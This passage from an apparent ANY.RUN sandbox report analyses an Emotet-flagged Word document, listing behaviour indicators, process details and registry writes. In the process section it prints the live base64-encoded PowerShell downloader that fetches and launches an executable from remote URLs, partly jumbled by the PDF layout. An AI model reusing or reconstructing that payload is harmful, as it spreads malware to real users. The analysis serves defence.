Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000) KB2900986
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2908783
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000) KB2911501
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000) KB2912390
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013) KB2918077
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000) KB2919469
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000) KB2923545
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000) KB2931356
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000) KB2937610
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000) KB2943357
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000) KB2952664
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2968294
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000) KB2970228
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000) KB2972100
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013) KB2972211
Microsoft Office Professional 2010 (14.0.6029.1000) KB2973112
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000) KB2973201
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000) KB2977292
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000) KB2978120
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000) KB2978742
Microsoft Office Proof (English) 2010 (14.0.6029.1000) KB2984972
Microsoft Office Proof (French) 2010 (14.0.6029.1000) KB2984976
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000) KB2984976 SP1
Microsoft Office Proof (German) 2010 (14.0.4763.1000) KB2985461
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000) KB2991963
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000) KB2992611
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000) KB2999226
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3004375
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000) KB3006121
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000) KB3006137
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013) KB3010788
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000) KB3011780
Microsoft Office Proofing (English) 2010 (14.0.6029.1000) KB3013531
Microsoft Office Proofing (French) 2010 (14.0.4763.1000) KB3019978
Microsoft Office Proofing (German) 2010 (14.0.4763.1000) KB3020370
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000) KB3020388
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000) KB3021674
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000) KB3021917
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3022777
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000) KB3023215
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000) KB3030377
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013) KB3031432
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000) KB3035126
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000) KB3037574
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000) KB3042058
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000) KB3045685
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000) KB3046017
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000) KB3046269
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3054476
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000) KB3055642
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000) KB3059317
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013) KB3060716
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000) KB3061518
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000) KB3067903
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000) KB3068708
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000) KB3071756
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000) KB3072305
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3074543
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000) KB3075226
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000) KB3078667
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013) KB3080149
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000) KB3086255
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 43/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000) KB3092601
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000) KB3093513
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000) KB3097989
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000) KB3101722
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000) KB3102429
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3102810
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000) KB3107998
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000) KB3108371
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013) KB3108664
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000) KB3109103
Microsoft Office Single Image 2010 (14.0.6029.1000) KB3109560
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000) KB3110329
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000) KB3115858
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000) KB3118401
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000) KB3122648
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000) KB3123479
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000) KB3126587
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3127220
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000) KB3133977
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000) KB3137061
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013) KB3138378
Microsoft Office X MUI (French) 2010 (14.0.4763.1000) KB3138612
Microsoft Office X MUI (German) 2010 (14.0.4763.1000) KB3138910
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000) KB3139398
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000) KB3139914
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000) KB3140245
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3147071
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000) KB3150220
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000) KB3150513
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013) KB3155178
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161) KB3156016
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219) KB3159398
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0) KB3161102
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005) KB3161949
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005) KB3170735
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2) KB3172605
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702) KB3179573
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702) KB3184143
Mozilla Firefox 83.0 (x86 en-US) (83.0) KB3185319
Mozilla Maintenance Service (83.0.0.7621) KB4019990
Notepad++ (32-bit x86) (7.9.1) KB4040980
Opera 12.15 (12.15.1748) KB4474419
QGA (2.14.33) KB4490628
Skype version 8.29 (8.29) KB4524752
VLC media player (3.0.11) KB4532945
WinRAR 5.91 (32-bit) (5.91.0) KB4536952
KB4567409
KB958488
KB976902
KB982018
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
Package 21 for KB2984976
Package 38 for KB2984976
Package 45 for KB2984976
Package 59 for KB2984976
Package 7 for KB2984976
Package 76 for KB2984976
PlatformUpdate Win7 SRV08R2 Package TopLevel
ProfessionalEdition
RDP BlueIP Package TopLevel
RDP WinIP Package TopLevel
RollupFix
UltimateEdition
WUClient SelfUpdate ActiveX
WUClient SelfUpdate Aux TopLevel
WUClient SelfUpdate Core TopLevel
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 44/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Behavior activities
MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process Checks supported languages Reads the computer name
regidle.exe (PID: 3164) POwersheLL.exe (PID: 3828) WINWORD.EXE (PID: 2728)
G_jugk.exe (PID: 1640) regidle.exe (PID: 3164)
Creates files in the user directory
G_jugk.exe (PID: 1640)
EMOTET was detected WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164) Reads the computer name
Checks supported languages
POwersheLL.exe (PID: 3828)
Drops executable file immediately after starts WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164)
G_jugk.exe (PID: 1640)
G_jugk.exe (PID: 1640) Reads mouse settings
Connects to CnC server WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164) Reads the date of Windows installation
POwersheLL.exe (PID: 3828) Reads Microsoft Office registry keys
WINWORD.EXE (PID: 2728)
PowerShell script executed
POwersheLL.exe (PID: 3828)
Creates files in the user directory
POwersheLL.exe (PID: 3828)
Reads Environment values
POwersheLL.exe (PID: 3828)
Executed via WMI
POwersheLL.exe (PID: 3828)
G_jugk.exe (PID: 1640)
Executable content was dropped or overwritten
POwersheLL.exe (PID: 3828)
G_jugk.exe (PID: 1640)
Starts itself from another location
G_jugk.exe (PID: 1640)
Malware configuration
No Malware configuration.
Static information
TRiD EXIF
.doc | Microsoft Word document (54.2) FlashPix
.doc | Microsoft Word document (old ver.) (32.2) Title: Minima.
Subject:
Author: Mael Schneider
Keywords:
Comments:
Template: Normal.dotm
LastModifiedBy: Noa Masson
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: 0
CreateDate: 2020:10:22 06:54:00
ModifyDate: 2020:10:22 06:54:00
Pages: 1
Words: 3675
Characters: 20950
Security: Locked for annotations
Company:
Lines: 174
Paragraphs: 49
CharCountWithSpaces: 24576
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs: Title
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
TagE: Sapiente animi numquam iure aut. Tempore saepe nam aut
ratione ipsa vel tempore quae. Sequi repellendus quia et
voluptatem.
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 45/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Video and screenshots
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 46/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Processes
Total processes Monitored processes Malicious processes Suspicious processes
45 4 2 1
Behavior graph
start winword.exe
no specs
powershell.exe
#EMOTET
g_jugk.exe drop and start regidle.exe
Specs description
Program did not start Low-level access to the HDD Process was added to the startup Debug information is available
Probably Tor was used Behavior similar to spam Task has injected processes Executable file was dropped
Known threat RAM overrun Network attacks were detected Integrity level elevation
Connects to the network CPU overrun Process starts the services System was rebooted
Application downloaded the Actions similar to stealing personal
Task contains several apps running Task has apps ended with an error
executable file data
File is detected by antivirus software Inspected object has suspicious PE Behavior similar to exploiting Task contains an error or was
structure the vulnerability rebooted
The process has the malware config
Process information
PID CMD Path Indicators Parent process
2728 "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n C:\Program Files\Microsoft Office\Office14\WINWORD.EXE — Explorer.EXE
"C:\Users\admin\AppData\Local\Temp\CMO-100120 CDW-
102220.doc"
Information
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 47/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
User: admin Company: Microsoft Corporation
3828
IntegrityPOwersheLL
Level: -ENCOD
MEDIUM Description: C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.e
Microsoft Word wmiprvse.exe
IABTAGUAVAAtAEkAVABFAE0AIABWAGEAcgBpAGEAYgBsAGUA xe
Version:OgBWAGgARAAyADkANQAgACAAKAAgACAAWwBUAHkAcABlAF
14.0.6024.1000
0AKAAiAHsAMgB9AHsANAB9AHsAMQB9AHsAMwB9AHsAMAB
9ACIAIAAtAGYAJwAuAGQASQByAEUAQwB0AG8AUgBZACcALA
AnAFQARQBtAC4AJwAsACcAUwBZACcALAAnAGkATwAnACwA
JwBzACcAKQApADsAIAAgACAAJAB0AHcAOQA9AFsAdAB5AHA
AZQBdACgAIgB7ADMAfQB7ADUAfQB7ADYAfQB7ADEAfQB7ADc
AfQB7ADAAfQB7ADgAfQB7ADIAfQB7ADQAfQAiAC0AZgAgACcA
TQBhAG4AYQAnACwAJwBWAEkAYwBlAHAAbwBpACcALAAnAG
UAJwAsACcAUwB5AFMAJwAsACcAUgAnACwAJwBUAGUAbQA
uAG4AZQBUAC4AUwAnACwAJwBlAHIAJwAsACcAbgB0ACcALA
AnAGcAJwApACAAIAA7ACAAJABJADAAcgBlADIAMwBlAD0AKA
AnAFgAZwAnACsAJwBzAGQAJwArACgAJwBfADAAJwArACcAc
gAnACkAKQA7ACQAWQAzADgAMABvADEAZgA9ACQASQBxAH
AANQB1AGUAYQAgACsAIABbAGMAaABhAHIAXQAoADYANAAp
ACAAKwAgACQARAB4AGQAOABvAHYAeAA7ACQASAA0AHgAc
QBpAGIAagA9ACgAKAAnAEEAaQAnACsAJwBsAHQAJwApACsA
KAAnAHYAJwArACcAOABuACcAKQApADsAIAAkAFYASABkADIA
OQA1ADoAOgAiAEMAcgBFAGAAQQB0AGUAZABJAFIAZQBgAG
MAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnA
HMAJwArACgAJwBhACcAKwAnAGMASgAnACkAKwAoACcAZQ
AnACsAJwBoAGgAegAnACsAJwBkAGEAJwApACsAKAAnAHMA
YQAnACsAJwBjACcAKQArACgAJwBCAGUAbgAxADQAJwArACc
AZgAnACsAJwByAHMAYQBjACcAKQApAC4AIgByAEUAYABQAE
wAQQBDAEUAIgAoACgAJwBzAGEAJwArACcAYwAnACkALAAnA
FwAJwApACkAKQA7ACQAUQA1AG8AbQAyAHgAdQA9ACgAJwB
ZACcAKwAoACcAeQAnACsAJwBhAGUAegAnACsAJwBpAHYAJ
wApACkAOwAgACAAKABDAEgAaQBsAEQASQBUAGUAbQAgACg
AJwBWAGEAcgAnACsAJwBpAGEAQgBsAEUAOgBUACcAKwAnA
FcAJwArACcAOQAnACkAIAApAC4AdgBBAEwAdQBlADoAOgAiA
HMARQBjAFUAcgBgAGkAdAB5AHAAcgBgAG8AVABvAGMAYAB
PAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQ
ArACcAMgAnACkAOwAkAE4AegA1AGcAbABiAGwAPQAoACgAJ
wBFADQANQAnACsAJwBtACcAKQArACcANQAnACsAJwBzAGkA
JwApADsAJABHAHIAcQA0ADAAMwBsACAAPQAgACgAKAAnAE
cAXwBqACcAKwAnAHUAJwApACsAJwBnACcAKwAnAGsAJwAp
ADsAJABRAGoAcABzAHYAYQBmAD0AKAAoACcAVQB4ADAAXw
AnACsAJwA4AGQAJwApACsAJwBnACcAKQA7ACQAUAB0AGQA
ZwA5ADUAaAA9ACgAKAAnAEwAcAAnACsAJwA1ADcAJwApAC
sAKAAnADEAMAAnACsAJwBhACcAKQApADsAJABTAGcAdwBx
ADcANwA5AD0AJABIAE8ATQBFACsAKAAoACgAJwBGADUAQgB
KACcAKwAnAGUAaAAnACkAKwAnAGgAegAnACsAJwBkACcAK
wAoACcAYQBGADUAJwArACcAQgBCACcAKQArACgAJwBlAG4A
MQAnACsAJwA0AGYAJwArACcAcgBGADUAQgAnACkAKQAuACI
AUgBlAFAAbABgAEEAQwBlACIAKAAoAFsAQwBoAEEAcgBdADc
AMAArAFsAQwBoAEEAcgBdADUAMwArAFsAQwBoAEEAcgBdA
DYANgApACwAWwBzAHQAcgBpAG4ARwBdAFsAQwBoAEEAcgB
dADkAMgApACkAKwAkAEcAcgBxADQAMAAzAGwAKwAoACcAL
gAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABHAHcA
ZwA5ADgAdQAxAD0AKAAnAEEANwAnACsAJwBiAHoAJwArACg
AJwA2ACcAKwAnAHMAbQAnACkAKQA7ACQAUwBsAGwAOABv
AGsAdQA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQB
jACcAKwAnAHQAJwApACAAbgBFAHQALgBXAGUAYgBDAEwAS
QBFAG4AdAA7ACQARwBfAGEAdwBoAGkAOQA9ACgAKAAnAGg
AdAB0AHAAOgA9ACcAKwAnAFAATwAnACsAJwAzACcAKQArAC
cAMgA9ACcAKwAoACcAUABPADMAMgBlACcAKwAnAHUAYgBh
ACcAKwAnAG4AawBzACcAKwAnADcALgAnACsAJwBjAG8AJwA
pACsAJwBtAD0AJwArACcAUABPACcAKwAnADMAJwArACgAJw
AyAGEAZABtAGkAJwArACcAbgBpACcAKQArACgAJwBzAHQAcg
AnACsAJwBhAHQAbwByAD0AJwArACcAUAAnACkAKwAnAE8A
MwAnACsAKAAnADIAJwArACcAdQBiACcAKQArACgAJwBkAEQ
AYgAnACsAJwBCAD0AUABPACcAKwAnADMAJwArACcAMgBAA
GgAJwApACsAJwB0AHQAJwArACgAJwBwAHMAJwArACcAOg
AnACkAKwAnAD0AJwArACgAJwBQACcAKwAnAE8AMwAnACkA
KwAoACcAMgAnACsAJwA9AFAAJwApACsAKAAnAE8AJwArACc
AMwAnACsAJwAyAGUAcgBrACcAKQArACgAJwBhAGwAYQAnA
CsAJwAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAn
ACsAJwA9AFAATwAzADIAdwBwAC0AYQAnACsAJwBkAG0AJwA
pACsAJwBpACcAKwAnAG4AJwArACgAJwA9AFAATwAnACsAJw
AzACcAKQArACcAMgAnACsAJwBtAGkAJwArACgAJwA1ACcAK
wAnAG0APQAnACkAKwAoACcAUAAnACsAJwBPADMAMgBAAC
cAKQArACcAaAAnACsAKAAnAHQAdAAnACsAJwBwADoAPQAn
ACkAKwAoACcAUAAnACsAJwBPADMAMgAnACkAKwAnAD0AU
AAnACsAJwBPACcAKwAoACcAMwAyACcAKwAnAGwAaQAnACs
AJwBkAG8AcgBhAGcAZwBpAG8AZAAnACsAJwBpACcAKQArAC
cAcwBvACcAKwAoACcAbAAnACsAJwBlAC4AaQB0AD0AJwArA
CcAUABPADMAJwApACsAJwAyACcAKwAnAGMAJwArACgAJw
BnAGkAJwArACcALQAnACkAKwAoACcAYgBpACcAKwAnAG4AP
QBQAE8AJwApACsAJwAzADIAJwArACcAegAnACsAKAAnAEwA
JwArACcARwA4ACcAKwAnADcAOQA9AFAAJwApACsAKAAnAE
8AMwAyACcAKwAnAEAAaAAnACkAKwAoACcAdAAnACsAJwB0
AHAAOgAnACkAKwAoACcAPQAnACsAJwBQAE8AJwApACsAKA
AnADMAMgAnACsAJwA9AFAAJwApACsAJwBPACcAKwAnADM
AMgAnACsAJwBuACcAKwAnAGkAJwArACgAJwBjACcAKwAnAG
sAJwArACcAagBlAGgAbABlAG4ALgBjAG8AJwArACcAbQA9AFA
AJwArACcATwAzADIAbwBsAGQAJwApACsAKAAnAHMAJwArA
CcAaQB0AGUAPQBQAE8AMwAnACsAJwAyAG4AJwArACcAWgB
TACcAKQArACgAJwBOAFEAPQBQACcAKwAnAE8AJwArACcAM
wAnACkAKwAnADIAQAAnACsAKAAnAGgAJwArACcAdAB0ACcA
KwAnAHAAOgA9AFAAJwApACsAJwBPACcAKwAoACcAMwAyA
D0AJwArACcAUABPADMAMgB3AHcAdwAnACsAJwAuACcAKwA
nAHIAJwArACcAaQAnACkAKwAoACcAbQBpACcAKwAnAG4Adg
BlAHMAJwApACsAJwB0ACcAKwAoACcALgAnACsAJwB2AG4A
PQBQAE8AMwAyAGkAJwArACcAbgAnACkAKwAnAHMAJwArAC
cAdAAnACsAJwBhACcAKwAnAGwAbAAnACsAKAAnAD0AUAAn
ACsAJwBPADMAMgBaAHgAaAA9AFAATwAnACsAJwAzADIAJw
ArACcAQAAnACkAKwAoACcAaAAnACsAJwB0AHQAcAAnACkAK
wAnADoAJwArACcAPQAnACsAKAAnAFAAJwArACcATwAzADIA
PQAnACkAKwAnAFAAJwArACcATwAnACsAKAAnADMAMgB3AH
cAJwArACcAdwAnACsAJwAuADEAYwAnACkAKwAnAGEALgAnA
CsAJwBjACcAKwAnAG8AJwArACcALgAnACsAJwB6ACcAKwAn
AGEAJwArACgAJwA9AFAATwAnACsAJwAzACcAKQArACgAJwA
yACcAKwAnADEAYwBBACcAKQArACcAZAAnACsAKAAnAG0AaQ
BuAD0AUAAnACsAJwBPACcAKQArACcAMwAyACcAKwAnAGIAP
QAnACsAKAAnAFAATwAzACcAKwAnADIAJwApACsAKAAnAEAA
aAB0AHQAJwArACcAcAAnACkAKwAoACcAOgAnACsAJwA9AFA
ATwAzACcAKQArACgAJwAyAD0AUABPACcAKwAnADMAJwApA
CsAJwAyAHAAJwArACcAYQAnACsAKAAnAHUAbAAnACsAJwBz
AGMAbwAnACkAKwAnAG0AcAAnACsAJwB1ACcAKwAoACcAdA
BpAG4AJwArACcAZwAuAGMAbwAnACkAKwAoACcAbQAnACsA
JwA9AFAATwAzADIAJwApACsAKAAnAEMAJwArACcAcgBhAGk
AZwAnACkAKwAnAHMATQAnACsAJwBhAGcAJwArACcAaQAnA
CsAJwBjAFMAJwArACcAcQAnACsAJwB1AGEAJwArACgAJwBy
ACcAKwAnAGUAPQBQAE8AMwAnACkAKwAoACcAMgBmACcAK
wAnAD0AUAAnACkAKwAoACcATwAzADIAQABoACcAKwAnAHQ
AJwApACsAJwB0ACcAKwAnAHAAJwArACgAJwA6AD0AJwArA
CcAUABPACcAKwAnADMAMgAnACkAKwAnAD0AJwArACgAJwB
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 48/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
QAE8AJwArACcAMwAnACkAKwAoACcAMgB3ACcAKwAnAGkAJ
wApACsAKAAnAGsAaQAnACsAJwBiAHIAaQAnACkAKwAnAGMA
bwAnACsAKAAnAGwAJwArACcAYQBnAGUALgBjAG8AbQAnACs
AJwA9ACcAKwAnAFAAJwArACcATwAzADIAdwBwACcAKwAnAC
0AJwArACcAYQBkAG0AaQAnACkAKwAoACcAbgA9AFAAJwArA
CcATwAnACkAKwAoACcAMwAyAFgAaQAnACsAJwBaACcAKQAr
ACgAJwByAGIAJwArACcAeQA9AFAAJwApACsAJwBPACcAKwA
nADMAMgAnACkALgAiAFIAYABFAFAATABBAGAAYwBFACIAKAA
oACgAJwA9AFAATwAnACsAJwAzACcAKQArACcAMgAnACkALA
AnAC8AJwApAC4AIgBTAFAAbABgAEkAdAAiACgAJABCAGgAeQ
BiAGQAZQBmACAAKwAgACQAWQAzADgAMABvADEAZgAgACs
AIAAkAEEAXwBiAGYAaABrAGgAKQA7ACQAUQA1ADIAbAA5AGo
ANwA9ACgAJwBVADUAJwArACgAJwBmACcAKwAnAGIAMwAn
ACkAKwAnAHQAdgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKA
AkAFcAeAB5AG4AagAxADkAIABpAG4AIAAkAEcAXwBhAHcAaA
BpADkAKQB7AHQAcgB5AHsAJABTAGwAbAA4AG8AawB1AC4AI
gBkAGAAbwBXAG4ATABvAEEARABmAGAAaQBsAGUAIgAoACQ
AVwB4AHkAbgBqADEAOQAsACAAJABTAGcAdwBxADcANwA5A
CkAOwAkAEMAMQA0AHQAbABfAGIAPQAoACcATAAnACsAKAA
nAG0AOAAnACsAJwA5AHMAdgBkACcAKQApADsASQBmACAA
KAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACc
AbQAnACkAIAAkAFMAZwB3AHEANwA3ADkAKQAuACIAbABFAG
AATgBHAGAAVABoACIAIAAtAGcAZQAgADQANAA2ADgANgApA
CAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwAr
ACgAJwBpAG4AMwAyACcAKwAnAF8AUAAnACkAKwAoACcAcg
BvAGMAZQAnACsAJwBzAHMAJwApACkAKQAuACIAYwBgAFIA
YABlAGEAVABFACIAKAAkAFMAZwB3AHEANwA3ADkAKQA7ACQ
ARwBjAGEAMwBiAGYANQA9ACgAJwBQACcAKwAoACcAagBrAD
AAZQAnACsAJwBjAHQAJwApACkAOwBiAHIAZQBhAGsAOwAkA
EMAYgByAHMAeQBzAHgAPQAoACcAUAAnACsAKAAnADYAJwA
rACcAdwBtADkAdQBoACcAKQApAH0AfQBjAGEAdABjAGgAewB9
AH0AJABLAG0AdABxAHUAZwBjAD0AKAAoACcAWgBoAHoAJw
ArACcAMQAnACkAKwAoACcAMwBnACcAKwAnAG0AJwApACkA
Information
User: admin Company: Microsoft Corporation
Integrity Level: MEDIUM Description: Windows PowerShell
Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1640 C:\Users\admin\Jehhzda\Ben14fr\G_jugk.exe C:\Users\admin\Jehhzda\Ben14fr\G_jugk.exe wmiprvse.exe
Information
User: admin Integrity Level: MEDIUM
Description: EffectDemo MFC Application Exit code: 0
Version: 1, 0, 0, 1
3164 "C:\Users\admin\AppData\Local\photowiz\regidle.exe" C:\Users\admin\AppData\Local\photowiz\regidle.exe G_jugk.exe
Information
User: admin Integrity Level: MEDIUM
Description: EffectDemo MFC Application Version: 1, 0, 0, 1
Registry activity
Total events Read events Write events Delete events
5 580 4 614 779 187
Modification events
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write Name: ,x3
Value: 2C783300A80A0000010000000000000000000000
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1033
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1041
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1046
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1036
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1031
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1040
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 49/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1049
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 3082
Value: Off
(PID) Process: (2728) WINWORD.EXE Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write Name: 1042
Value: Off
Files activity
Executable files Suspicious files Text files Unknown types
2 3 0 3
Dropped files
PID Process Filename Type
